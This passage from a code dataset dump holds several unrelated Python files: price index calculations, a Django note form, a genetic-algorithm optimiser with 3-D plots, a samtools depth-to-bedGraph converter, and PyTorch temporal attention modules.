(TPD, TDH).\n\"\"\"\nfrom typing import Sequence, Optional, Union\n\nimport pandas as pd\nimport seaborn as sns\n\nfrom .helpers import _weights_calc\nfrom .bilateral import *\nfrom .multilateral import *\n\n__author__ = ['Dr. Usman Kayani']\n\ndef bilateral_methods(\n    df: pd.DataFrame,\n    price_col: str = 'price',\n    quantity_col: str = 'quantity',\n    date_col: str='month',\n    product_id_col: str='id',\n    groups: Optional[Sequence[str]] = None,\n    method: str = 'tornqvist',\n    base_month: Union[int, str] = 1,\n    reference_month: Union[int, str] = 1,\n    plot: bool = False,\n) -> pd.DataFrame:\n    \"\"\"\n    Calculate all the bilateral indices.\n\n    Parameters\n    ----------\n    df: pandas DataFrame\n        Contains price and quantity columns, a time series column, and a product\n        ID column as a minimum. A characteristics column should also be present\n        for hedonic methods.\n    price_col: str, defaults to 'price'\n        User-defined name for the price column.\n    quantity_col: str, defaults to 'quantity'\n        User-defined name for the quantity column.\n    date_col: str, defaults to 'month'\n        User-defined name for the date column.\n    product_id_col: str, defaults to 'id'\n        User-defined name for the product ID column.\n    groups: list of str, defaults to None\n        The names of the groups columns.\n    method: str, defaults to 'tornqvist'\n        Options: {'carli', 'jevons', 'dutot', 'laspeyres', 'paasche',\n        'geom_laspeyres', 'geom_paasche', 'drobish', 'marshall_edgeworth',\n        'palgrave', 'fisher', 'tornqvist', 'walsh', 'sato_vartia', 'lowe',\n        'geary_khamis_b', 'tpd', 'rothwell'}\n\n        The bilateral method to use.\n    base_month: int or str, defaults to 1\n        Integer or string specifying the base month. An integer specifies the\n        position while a string specifies the month in the format 'YYYY-MM'.\n    reference_month: int or str, defaults to 1\n        Integer or string specifying the reference month for rebasing if\n        different from the base month. 
An integer specifies the position while a\n        string specifies the month in the format 'YYYY-MM'.\n    plot: bool, defaults to False\n        Boolean parameter on whether to plot the resulting timeseries for price\n        indices.\n\n    Returns\n    -------\n    pd.DataFrame\n        Dataframe containing the timeseries and index values.\n    \"\"\"\n    method = method.lower()\n\n    valid_bilateral_methods = {\n        'carli', 'jevons', 'dutot', 'laspeyres', 'lowe',\n        'paasche', 'geom_laspeyres', 'geom_paasche', 'drobish',\n        'marshall_edgeworth', 'palgrave', 'fisher', 'tornqvist',\n        'walsh', 'sato_vartia', 'geary_khamis_b', 'tpd', 'rothwell'\n    }\n\n    if method not in valid_bilateral_methods:\n        raise ValueError(\"Invalid option, please select a valid bilateral method.\")\n\n    args = (price_col, quantity_col, date_col, product_id_col)\n\n    periods = sorted(df[date_col].unique())\n    no_of_periods = len(periods)\n\n    if isinstance(base_month, str):\n        base_month = periods.index(base_month) + 1\n\n    if isinstance(reference_month, str):\n        reference_month = periods.index(reference_month) + 1\n\n    # Obtain the base period in the dataframe.\n    base_period = periods[base_month-1]\n\n    # Determine product IDs present in the base period.\n    df_base_master = df.loc[df[date_col] == base_period]\n    keep_ids = df_base_master.loc[:, product_id_col].unique()\n\n    # Filter df to remove product IDs not present in the base period.\n    df = df[df[product_id_col].isin(keep_ids)].reset_index(drop=True)\n\n    if groups:\n        return (\n            df\n            .groupby(groups)\n            .apply(\n                lambda df_group: bilateral_methods(\n                    df_group,\n                    *args,\n                    method=method,\n                    base_month=base_month,\n                    reference_month=reference_month,\n                    plot=plot,\n                )\n            )\n            .reset_index()\n            .rename({'level_1': 'month'}, axis=1)\n        )\n\n    index_vals = np.zeros(no_of_periods)\n\n    if method != 'tpd':\n        # Obtain bilateral function for bilateral method.\n        func = globals()[method]\n\n    for i in range(no_of_periods):\n        # Get data for base and current period.\n        df_base = df_base_master\n        df_curr = df.loc[df[date_col] == periods[i]]\n\n        # Make sure the sample is matched for given periods.\n        df_base = df_base[df_base[product_id_col].isin(df_curr[product_id_col])]\n        df_curr = df_curr[df_curr[product_id_col].isin(df_base[product_id_col])]\n\n        if method == 'tpd':\n            # Use multilateral TPD method with two periods.\n            df_matched = (\n                pd.concat([df_base, df_curr])\n                .drop_duplicates()\n            )\n            # Recalculate weights for matched df.\n            df_matched = _weights_calc(df_matched)\n            # Store the two-period TPD result for this period.\n            index_vals[i] = time_dummy(df_matched)[-1]\n        else:\n            # Find price and quantity vectors of base period and current period.\n            p_base = df_base[price_col].to_numpy()\n            p_curr = df_curr[price_col].to_numpy()\n            data = (p_base, p_curr)\n\n            # Get quantities for bilateral methods that use this information.\n            if method in {\n                'laspeyres', 'drobish', 'marshall_edgeworth',\n                'geom_laspeyres', 'tornqvist', 'fisher',\n                'walsh', 'sato_vartia', 'geary_khamis_b', \n                'rothwell', 'lowe'\n            }:\n                q_base = df_base[quantity_col].to_numpy()\n                data += (q_base, )\n            if method in {\n                'paasche', 'drobish','palgrave',\n                'marshall_edgeworth', 'geom_paasche', 'tornqvist',\n                'fisher', 'walsh', 'sato_vartia',\n                'geary_khamis_b'\n            }:\n                q_curr = df_curr[quantity_col].to_numpy()\n                data += (q_curr, )\n\n            # Compute the bilateral index between the base and current periods\n            # and store the result for this period.\n            index_vals[i] = func(*data)\n\n    output_df = (\n        pd.DataFrame(\n            index_vals,\n            index=periods\n        )\n        .rename({0: 'index_value'}, axis=1)\n    )\n    
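# Keep periods in chronological order; if the reference month differs from\n    # the base month, the rebasing step below divides through by its index value.\n    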
output_df.sort_index(inplace=True)\n if base_month != reference_month:\n # Rebase the index values to the reference month.\n output_df = output_df / output_df.iloc[reference_month-1]\n if plot:\n sns.set(rc={'figure.figsize':(11, 4)})\n (output_df * 100).plot(linewidth=2)\n return output_df\n\ndef multilateral_methods(\n df: pd.DataFrame,\n price_col: str = 'price',\n quantity_col: str = 'quantity',\n date_col: str='month',\n product_id_col: str='id',\n characteristics: Optional[Sequence[str]] = None,\n groups: Optional[Sequence[str]] = None,\n method: str = 'all',\n bilateral_method: str = 'tornqvist',\n td_engine: str = 'numpy',\n reference_month: Union[int, str] = 1,\n plot: bool = False,\n) -> pd.DataFrame:\n \"\"\"\n Calculate all the multilateral indices.\n\n Currently supported: GEKS (geks), Geary-Khamis (gk), Time Product Dummy\n (tpd) and Time Hedonic Dummy (tdh).\n\n Parameters\n ----------\n df: pandas DataFrame\n Contains price and quantity columns, a time series column, and a product\n ID column as a minimum. A characteristics column should also be present\n for hedonic methods.\n price_col: str, defaults to 'price'\n User-defined name for the price column.\n quantity_col: str, defaults to 'quantity'\n User-defined name for the quantity column.\n date_col: str, defaults to 'month'\n User-defined name for the date column.\n product_id_col: str, defaults to 'id'\n User-defined name for the product ID column.\n characteristics: list of str, defaults to None\n The names of the characteristics columns.\n groups: list of str, defaults to None\n The names of the groups columns.\n method: str, defaults to 'all'\n Options: {'all', 'geks', gk', 'tpd', 'tdh'}\n\n The multilateral method to apply. The 'all' option uses the\n GEKS paired with a bilateral, GK and TPD index.\n bilateral_method: str, defaults to 'tornqvist'\n Options: {'carli', 'jevons', 'dutot', 'laspeyres', 'paasche',\n 'geom_laspeyres', 'geom_paasche', 'drobish', 'marshall_edgeworth',\n 'palgrave', 'fisher', 'tornqvist', 'walsh', 'sato_vartia', 'lowe',\n 'geary_khamis_b', 'rothwell'}\n\n The bilateral method to pair with `method='geks'`.\n td_engine: str, defaults to 'numpy'\n Options: {'numpy', 'statsmodels', 'sklearn', 'pyspark'}\n\n Engine to use for wls computation with `method='tpd'`.\n reference_month: int or str, defaults to 1\n The month to use as the reference month for the multilateral methods. 
An\n        integer specifies the position while a string specifies the month in the\n        format 'YYYY-MM'.\n    plot: bool, defaults to False\n        Boolean parameter on whether to plot the resulting timeseries for price\n        indices.\n\n    Returns\n    -------\n    pd.DataFrame\n        Dataframe containing the timeseries and index values.\n    \"\"\"\n    method, bilateral_method = method.lower(), bilateral_method.lower()\n\n    valid_methods = {'all', 'geks', 'gk', 'tpd', 'tdh'}\n    valid_bilateral_methods = {\n        'carli', 'jevons', 'dutot', 'laspeyres', 'lowe',\n        'paasche', 'geom_laspeyres', 'geom_paasche', 'drobish',\n        'marshall_edgeworth', 'palgrave', 'fisher', 'tornqvist',\n        'walsh', 'sato_vartia', 'geary_khamis_b', 'tpd', 'rothwell'\n    }\n\n    if method not in valid_methods:\n        raise ValueError(\"Invalid option, please select a valid method.\")\n\n    if method in {'all', 'geks'} and bilateral_method not in valid_bilateral_methods:\n        raise ValueError(\"Invalid option, please select a valid bilateral method for GEKS.\")\n\n    args = (price_col, quantity_col, date_col, product_id_col)\n\n    # Obtain unique time periods present in the data.\n    periods = sorted(df[date_col].unique())\n\n    if isinstance(reference_month, str):\n        reference_month = periods.index(reference_month) + 1\n\n    if groups:\n        return (\n            df\n            .groupby(groups)\n            .apply(\n                lambda df_group: multilateral_methods(\n                    df_group,\n                    *args,\n                    characteristics=characteristics,\n                    method=method,\n                    bilateral_method=bilateral_method,\n                    td_engine=td_engine,\n                    reference_month=reference_month,\n                    plot=plot\n                )\n            )\n            .reset_index()\n            .rename({'level_1': 'month'}, axis=1)\n        )\n    if quantity_col not in df.columns:\n        df[quantity_col] = 1\n    if bilateral_method not in ('jevons', 'carli', 'dutot'):\n        # Calculate weights for each item in each period.\n        df = _weights_calc(df, *args)\n\n    if method == 'all':\n        index_vals = {\n            'index_value_geks': geks(df, *args, bilateral_method),\n            'index_value_gk': geary_khamis(df, *args),\n            'index_value_td': time_dummy(df, *args, characteristics, engine=td_engine)\n        }\n    elif method == 'geks':\n        index_vals = geks(df, *args, bilateral_method)\n    elif method == 'gk':\n        index_vals = geary_khamis(df, *args)\n    elif method == 'tpd':\n        index_vals = time_dummy(df, *args, None, engine=td_engine)\n    elif method == 'tdh':\n        if not characteristics:\n            raise ValueError(\"Characteristics required for TDH.\")\n        else:\n            index_vals = time_dummy(df, *args, characteristics, engine=td_engine)\n    output_df = (\n        pd.DataFrame(\n            index_vals,\n            index=periods\n        )\n        .rename({0: 'index_value'}, axis=1)\n    )\n    output_df.sort_index(inplace=True)\n    if reference_month != 1:\n        output_df = output_df / output_df.iloc[reference_month - 1]\n    if plot:\n        sns.set(rc={'figure.figsize':(11, 4)})\n        (output_df * 100).plot(linewidth=2)\n    return output_df\n","repo_name":"drrobotk/PriceIndexCalc","sub_path":"src/PriceIndexCalc/pandas_modules/index_methods.py","file_name":"index_methods.py","file_ext":"py","file_size_in_byte":12816,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"37946154442","text":"from django import forms\nfrom .models import Note\n\nclass noteform(forms.ModelForm):\n\n    class Meta:\n        model = Note\n        fields = ['title','text','color']\n        labels = {'title':'Enter Title','text':'Description','color':'Colour'}\n        widgets={\n            'title':forms.TextInput(attrs={'class':'title'}),\n            # 'text':forms.Textarea(attrs={'class':'title'}),\n            # 'color':forms.Select(attrs={'class':'title'}),\n            # 'date':forms.DateInput(attrs={'type':'date','class':'title'})\n\n            
}","repo_name":"rjcoder86/Notes-App","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27240670150","text":"import datetime\nimport numpy as np\nfrom matplotlib.ticker import MultipleLocator\nfrom numpy.ma import cos\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\n\nDNA_SIZE = 12 # encoding length\nPOP_SIZE = 100 # population size\nCROSS_RATE = 0.8 # crossover rate\nMUTA_RATE = 0.8 # mutation rate\nIterations = 100 # number of generations\n\n# range for the maximisation problem\nX_BOUND = [0, 10] # X interval\nY_BOUND = [0, 10] # Y interval\n\n# range for the minimisation problem\n# X_BOUND = [1, 2] # X interval\n# Y_BOUND = [1, 2] # Y interval\n\ndef F(x, y): # objective function\n    # maximisation problem\n    return (6.452 * (x + 0.125 * y) * (cos(x) - cos(2 * y)) ** 2) / (0.8 + (x - 4.2) ** 2 + 2 * (y - 7) ** 2) + 3.226 * y\n    # minimisation problem\n    # return -(20+x**2+y**2-10*(cos(2*math.pi*x)+cos(2*math.pi*y)))\n\ndef decodeDNA(pop): # decode the genes\n    x1_pop = pop[:, 0::4]\n    y1_pop = pop[:, 1::4]\n    x2_pop = pop[:, 2::4]\n    y2_pop = pop[:, 3::4]\n\n    x1 = x1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n    y1 = y1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n    x2 = x2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n    y2 = y2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n\n    x = []\n    y = []\n    for i in range(POP_SIZE):\n        if F(x1[i],y1[i]) > F(x2[i],y2[i]):\n            x.append(x1[i])\n            y.append(y1[i])\n        else:\n            x.append(x2[i])\n            y.append(y2[i])\n    return x, y\n\ndef getfitness(pop): # compute the fitness\n    x, y = decodeDNA(pop)\n    temp = []\n    for i in range(POP_SIZE):\n        temp.append(F(x[i], y[i]))\n    return (temp - np.min(temp)) + 0.0001 # subtract the minimum fitness to prevent negative fitness values\n\ndef select(pop, fitness): # selection according to fitness (Monte Carlo)\n    temp = np.random.choice(np.arange(POP_SIZE), size=POP_SIZE, replace=True, p=(fitness) / (fitness.sum()))\n    return pop[temp]\n\ndef merge(i, j):\n    temp = []\n\n    i_x1_pop, i_y1_pop = i[0::4], i[1::4]\n    i_x2_pop, i_y2_pop = i[2::4], i[3::4]\n    j_x1_pop, j_y1_pop = j[0::4], j[1::4]\n    j_x2_pop, j_y2_pop = j[2::4], j[3::4]\n\n    i_x1 = i_x1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n    i_y1 = i_y1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n    i_x2 = i_x2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n    i_y2 = i_y2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n\n    j_x1 = j_x1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n    j_y1 = j_y1_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n    j_x2 = j_x2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (X_BOUND[1] - X_BOUND[0]) + X_BOUND[0]\n    j_y2 = j_y2_pop.dot(2 ** np.arange(DNA_SIZE)[::-1]) / float(2 ** DNA_SIZE - 1) * (Y_BOUND[1] - Y_BOUND[0]) + Y_BOUND[0]\n\n    if F(i_x1, i_y1) > F(i_x2, i_y2):\n        i_x_pop = i_x1_pop\n        i_y_pop = i_y1_pop\n    else:\n        i_x_pop = i_x2_pop\n        i_y_pop = i_y2_pop\n\n    if F(j_x1, j_y1) > F(j_x2, j_y2):\n        j_x_pop = j_x1_pop\n        j_y_pop = j_y1_pop\n    else:\n        j_x_pop = j_x2_pop\n        j_y_pop = j_y2_pop\n\n    for i in 
range(DNA_SIZE):\n        temp.append(i_x_pop[i])\n        temp.append(i_y_pop[i])\n        temp.append(j_x_pop[i])\n        temp.append(j_y_pop[i])\n\n    return temp\n\ndef crossmuta(pop, CROSS_RATE): # crossover and mutation of the population\n    new_pop = []\n    for i in pop: # iterate over every individual, taking it as the father\n        j = pop[np.random.randint(POP_SIZE)] # randomly pick another individual from the population as the mother\n        temp = merge(i, j) # combine the dominant genes of the two individuals into a new one\n        if np.random.rand() < CROSS_RATE: # crossover happens with probability CROSS_RATE\n            cpoints1 = np.random.randint(0, DNA_SIZE * 4 - 1) # randomly generate the two crossover points (interval: [cpoints1, cpoints2])\n            cpoints2 = np.random.randint(cpoints1, DNA_SIZE * 4)\n            temp[cpoints1:cpoints2] = j[cpoints1:cpoints2] # the child receives the mother's genes between the crossover points\n\n        mutation(temp, MUTA_RATE) # every offspring mutates with the mutation rate\n        new_pop.append(temp)\n    return new_pop\n\ndef mutation(temp, MUTA_RATE):\n    if np.random.rand() < MUTA_RATE: # mutate with probability MUTA_RATE\n        mutate_point = np.random.randint(0, DNA_SIZE * 4) # randomly pick an index, the position of the gene to mutate\n        temp[mutate_point] = temp[mutate_point] ^ 1 # flip the bit at the mutation point\n\n# plotting\ndef plot_3d(ax):\n    X = np.linspace(*X_BOUND, 100)\n    Y = np.linspace(*Y_BOUND, 100)\n    X, Y = np.meshgrid(X, Y)\n    Z = F(X, Y)\n    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm)\n    ax.set_zlim(-20, 100)\n    ax.set_xlabel('x')\n    ax.set_ylabel('y')\n    ax.set_zlabel('z')\n    plt.pause(3)\n    plt.show()\n\ndef OPT2_TEST():\n    i_list = range(100)\n    best_fitness = []\n    best_f = []\n    for i in i_list:\n        print(i)\n        pop = np.random.randint(2, size=(POP_SIZE, DNA_SIZE * 4)) # pop (2-D matrix) = (population size) * (DNA length * 4) random 0/1 values\n        for _ in range(Iterations): # iterate for N generations\n            pop = np.array(crossmuta(pop, CROSS_RATE)) # apply crossover and mutation to the population\n            fitness = getfitness(pop) # evaluate the fitness of every genome in the population\n            pop = select(pop, fitness) # selection produces the new population\n\n        fitness = getfitness(pop)\n        maxfitness = np.argmax(fitness)\n        x, y = decodeDNA(pop)\n        best_fitness.append(fitness[maxfitness])\n        best_f.append(F(x[maxfitness], y[maxfitness]))\n\n    best_f.sort()\n    plt.plot(i_list, best_f, marker='o', label=\"F_max(x,y)\")\n    plt.gca().xaxis.set_major_locator(MultipleLocator(10))\n    plt.legend()\n    plt.show()\n\ndef print_info(pop): # print the results\n    fitness = getfitness(pop)\n    maxfitness = np.argmax(fitness) # index of the maximum value\n    print(\"Iterations: \", Iterations)\n    print(\"Max fitness: \", fitness[maxfitness])\n    x,y = decodeDNA(pop)\n    print(\"Best genotype: \", pop[maxfitness])\n    print(\"Best solution (x,y) = \", (x[maxfitness], y[maxfitness]))\n    print(\"Best value F(x,y) = \", F(x[maxfitness],y[maxfitness]))\n\nif __name__ == \"__main__\":\n\n    # OPT2_TEST()\n\n    fig = plt.figure()\n    ax = Axes3D(fig)\n    plt.ion()\n    plot_3d(ax)\n\n    start_t = datetime.datetime.now()\n    pop = np.random.randint(2, size=(POP_SIZE, DNA_SIZE * 4)) # pop (2-D matrix) = population size * (DNA length * 4) random 0/1 values\n    for _ in range(Iterations): # iterate for N generations\n        x, y = decodeDNA(pop)\n        temp = []\n        for i in range(POP_SIZE):\n            temp.append(F(x[i], y[i]))\n        # update the plot\n        if 'sca' in locals():\n            sca.remove()\n        sca = ax.scatter(x, y, temp, c='black', marker='o')\n        plt.show()\n        plt.pause(0.1)\n\n        pop = np.array(crossmuta(pop, CROSS_RATE)) # apply crossover and mutation to the population\n        fitness = getfitness(pop) # evaluate the fitness of every genome in the population\n        pop = select(pop, fitness) # selection produces the new population\n\n    end_t = datetime.datetime.now()\n    print(\"Elapsed time: \", (end_t - start_t))\n    print_info(pop)\n    plt.ioff()\n    plot_3d(ax)\n\n","repo_name":"WondrousWisdomcard/SYSU-JuniorExperience","sub_path":"人工智能/作业/3 - 遗传算法求最值/opt_2.py","file_name":"opt_2.py","file_ext":"py","file_size_in_byte":7757,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"21"} +{"seq_id":"35379410328","text":"#!/usr/bin/env python\n\nimport sys, csv\nimport subprocess as sp\nimport codecs\n\nPYVER = 
sys.version_info.major\n\ndef Next(c):\n if PYVER == 2:\n return c.next()\n else:\n return c.__next__()\n\nclass Converter(object):\n blockChrom = \"\"\n blockStart = 0\n blockEnd = 0\n blockValue = 0\n scale = 1.0\n chrom = None\n window = None\n total = 0.0 # For window mode\n bamfile = None\n outfile = \"/dev/stdout\"\n \n def __init__(self, args):\n prev = \"\"\n for a in args:\n if prev == \"-s\":\n self.scale = float(a)\n prev = \"\"\n elif prev == \"-c\":\n self.chrom = a\n prev = \"\"\n elif prev == \"-o\":\n self.outfile = a\n prev = \"\"\n elif prev == \"-w\":\n self.window = int(a)\n prev = \"\"\n elif a in [\"-s\", \"-c\", \"-o\", \"-w\"]:\n prev = a\n else:\n self.bamfile = a\n\n def initialize(self, line):\n self.blockChrom = line[0]\n self.blockStart = int(line[1])\n self.blockEnd = self.blockStart\n self.blockValue = int(line[2])\n self.total = self.blockValue\n\n def writeBlock(self, out):\n out.write(\"{}\\t{}\\t{}\\t{}\\n\".format(self.blockChrom, self.blockStart-1, self.blockEnd-1, self.blockValue * self.scale)) \n\n def run(self):\n if self.chrom:\n cmdline = \"samtools depth -r {} {}\".format(self.chrom, self.bamfile)\n else:\n cmdline = \"samtools depth {}\".format(self.bamfile)\n proc = sp.Popen(cmdline, shell=True, stdout=sp.PIPE)\n with open(self.outfile, \"w\") as out:\n if PYVER == 2:\n c = csv.reader(proc.stdout, delimiter='\\t')\n else:\n c = csv.reader(codecs.iterdecode(proc.stdout, 'utf-8'), delimiter='\\t')\n line = Next(c)\n self.initialize(line)\n if self.window:\n self.run_window(c, out)\n else:\n for line in c:\n if line[0] != self.blockChrom:\n self.writeBlock(out)\n self.initialize(line)\n elif int(line[2]) == self.blockValue:\n self.blockEnd = int(line[1])\n else:\n self.writeBlock(out)\n self.initialize(line)\n self.writeBlock(out)\n\n def writeWindow(self, out):\n sz = self.blockEnd - self.blockStart + 1\n out.write(\"{}\\t{}\\t{}\\t{}\\n\".format(self.blockChrom, self.blockStart-1, self.blockEnd-1, self.total * self.scale / sz))\n\n def run_window(self, c, out):\n for line in c:\n if line[0] != self.blockChrom:\n self.writeWindow(out)\n self.initialize(line)\n elif int(line[1]) - self.blockStart < self.window:\n self.blockEnd = int(line[1])\n self.total += int(line[2])\n else:\n self.writeWindow(out)\n self.initialize(line)\n self.writeWindow(out)\n\n# Usage: depthToBedGraph in.bam -o out.bedGraph -c chrom -s scale\n\nif __name__ == \"__main__\":\n C = Converter(sys.argv[1:])\n C.run()\n","repo_name":"uf-icbr-bioinformatics/dasa","sub_path":"bin/depthToBedGraph.py","file_name":"depthToBedGraph.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14719771943","text":"# Code for \"TSM: Temporal Shift Module for Efficient Video Understanding\"\n# arXiv:1811.08383\n# Ji Lin*, Chuang Gan, Song Han\n# {jilin, songhan}@mit.edu, ganchuang@csail.mit.edu\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision\nimport pdb\nimport numpy as np\n\nclass TemporalDiff(nn.Module):\n def __init__(self, in_channels, out_channels, n_segment, kernel_size, stride=1, padding=0, bias=True, n_div=8):\n super(TemporalDiff, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.n_segment = n_segment\n self.kernel_size = kernel_size\n self.stride=stride\n self.padding=padding\n self.bias = bias\n self.n_div = n_div\n print('=> Using fold div: {}'.format(self.n_div))\n print('model equipped with 
temporal difference attention...')\n self.conv1_reduce = nn.Sequential(\n nn.Conv2d(in_channels, in_channels//n_div, kernel_size=1, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(in_channels//n_div),\n nn.ReLU(inplace=True))\n self.conv2_reduce = nn.Sequential(\n nn.Conv2d(in_channels, in_channels//n_div, kernel_size=1, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(in_channels//n_div),\n nn.ReLU(inplace=True))\n\n\n self.conv_inflate = nn.Sequential(\n nn.Conv2d(in_channels//n_div, in_channels, kernel_size=kernel_size, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True))\n\n\n def forward(self, x):\n # out = F.conv2d(x, self.weight, None, self.stride, 0, 1, self.channels)\n # out = F.pad(out, pad= [0, 0, 0, 1])\n # x.size = N*C*T*(H*W)\n\n\n nt, c, h, w = x.size()\n n_batch = nt // self.n_segment\n\n\n out = F.adaptive_avg_pool2d(x, (1, 1))\n rc = self.in_channels // self.n_div\n # print(out.size())\n # exit()\n left = self.conv1_reduce(out).view(n_batch, self.n_segment, rc, 1, 1)\n right = self.conv2_reduce(out).view(n_batch, self.n_segment, rc, 1, 1)\n out = left[:, :-1] - right[:, 1:]\n out = out.view(n_batch*(self.n_segment-1), rc, 1, 1)\n out = self.conv_inflate(out)\n\n\n #out = torch.sqrt(out*out)\n out = torch.sigmoid(out)\n out = out.view(n_batch, self.n_segment-1, c)\n out = F.pad(out, pad=[0, 0, 0, 1], mode='constant', value=1)\n out = out.view(nt, c, 1, 1)\n\n return out*x\n\nclass ChannelGate(nn.Module):\n def __init__(self, channels):\n super(ChannelGate, self).__init__()\n self.linearProj = nn.Conv2d(channels, channels, kernel_size=1, stride=1, padding=0, bias=True)\n self.bn = nn.BatchNorm2d(channels)\n self.relu = nn.ReLU(inplace=True)\n # pdb.set_trace()\n self.channels = channels\n start_idx = int((channels-1)*0.9)\n self.t_linear = nn.Conv2d(channels, 1, kernel_size=1, stride=1, padding=0)\n self.sigmoid = nn.Sigmoid()\n # self.linearProj.weight.data.zero_()\n # self.linearProj.bias.data.zero_()\n # with torch.no_grad():\n # self.linearProj.weight[start_idx,:,:,:] += 1.0\n\n def forward(self, x):\n\n x = F.adaptive_avg_pool2d(x, (1, 1))\n x = self.linearProj(x)\n t = self.t_linear(x)\n x = self.bn(x)\n x_in = self.relu(x)\n x_out = F.softmax(x_in/(self.sigmoid(t)+0.0001), dim=1)\n # pdb.set_trace()\n out = torch.cumsum(x_out, dim=1)\n # pdb.set_trace()\n # pdb.set_trace()\n # out = torch.zeros(x.shape).cuda()\n # start_idx = int(self.channels*0.3)\n # out[:,start_idx:,:,:] = 1\n # pdb.set_trace()\n\n return out\n\nclass AccumAtt(nn.Module):\n def __init__(self, channels, n_segment):\n\n super(AccumAtt, self).__init__()\n\n self.channels = channels\n self.n_segment = n_segment\n\n self.conv1_reduce = nn.Sequential(\n nn.Conv2d(channels, channels//8, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(channels//8),\n nn.ReLU(inplace=True))\n self.conv2_reduce = nn.Sequential(\n nn.Conv2d(channels, channels//8, kernel_size=1, stride=1, padding=0, bias=False),\n nn.BatchNorm2d(channels//8),\n nn.ReLU(inplace=True))\n\n self.Win = nn.Conv2d(channels//8, channels//8, kernel_size=(1,1), bias=True)\n self.Wg = nn.Conv2d(channels//8, channels//8, kernel_size=(1,1), bias=True)\n self.Wa = nn.Conv2d(channels//8, channels, kernel_size=(1,1), bias=True)\n self.gamma = nn.Conv2d(channels//4, 1, kernel_size=(1,1), bias=True)\n self.bn = nn.BatchNorm2d(channels//8)\n self.relu = nn.ReLU(inplace=True)\n\n self.sigmoid = nn.Sigmoid()\n self.relu = nn.ReLU()\n\n nn.init.xavier_uniform_(self.Win.weight)\n 
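# Xavier-initialise the remaining 1x1 projections of the recurrent gate;\n        # their biases are zeroed just below.\n        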
nn.init.xavier_uniform_(self.Wg.weight)\n nn.init.xavier_uniform_(self.Wa.weight)\n nn.init.xavier_uniform_(self.gamma.weight)\n self.Win.bias.data.zero_()\n self.Wg.bias.data.zero_()\n self.Wa.bias.data.zero_()\n self.gamma.bias.data.zero_()\n\n def forward(self, x):\n\n nt, c, w, h = x.size()\n n_batch = nt // self.n_segment\n\n x_vec = F.adaptive_avg_pool2d(x, (1,1))\n x = x.view(n_batch, self.n_segment, c, w, h)\n\n x_vec_left = self.conv1_reduce(x_vec).view(n_batch, self.n_segment, c//8, 1, 1)\n x_vec_right = self.conv2_reduce(x_vec).view(n_batch, self.n_segment, c//8, 1, 1)\n x_vec_diff = x_vec_left[:, :-1] - x_vec_right[:, 1:]\n x_vec_diff = F.pad(x_vec_diff, pad=[0, 0, 0, 0, 0, 0, 0, 1], mode='constant', value=1)\n\n x_global = x_vec_diff[:,-1] # torch.zeros((n_batch,c//8,1,1)).cuda()\n atts = []\n for t_idx in range(self.n_segment):\n # x_global = self.Win(x_vec_diff[:, t_idx, :, :, :].squeeze(1)) + self.Wg(x_global.clone())\n x_cat = torch.cat((x_vec_diff[:, t_idx, :, :, :].squeeze(1),x_global),dim=1)\n x_gamma = self.sigmoid(self.gamma(x_cat).repeat(1,c//8,1,1))\n x_global = x_vec_diff[:, t_idx, :, :, :].squeeze(1)*x_gamma + x_global.clone()*(1-x_gamma)\n x_att = self.sigmoid(self.Wa(x_global)).unsqueeze(1)\n atts.append(x_att)\n sigmas = torch.cat(atts, 1)\n out = x*sigmas\n\n # x_gather = []\n # x_accum = torch.zeros((n_batch,1,c,w,h)).cuda()\n\n # for t_idx in range(self.n_segment):\n # gamma = self.sigmoid(self.gamma(sigmas[:,t_idx,:,:,:]).unsqueeze(4).repeat(1,1,c,w,h))\n # x_accum = (1-gamma)*x_accum.clone() + gamma*x_atts[:, t_idx, :, :, :].unsqueeze(1)\n # x_gather.append(x_accum)\n # out = torch.cat(x_gather, 1).view(-1,c,w,h)\n\n return 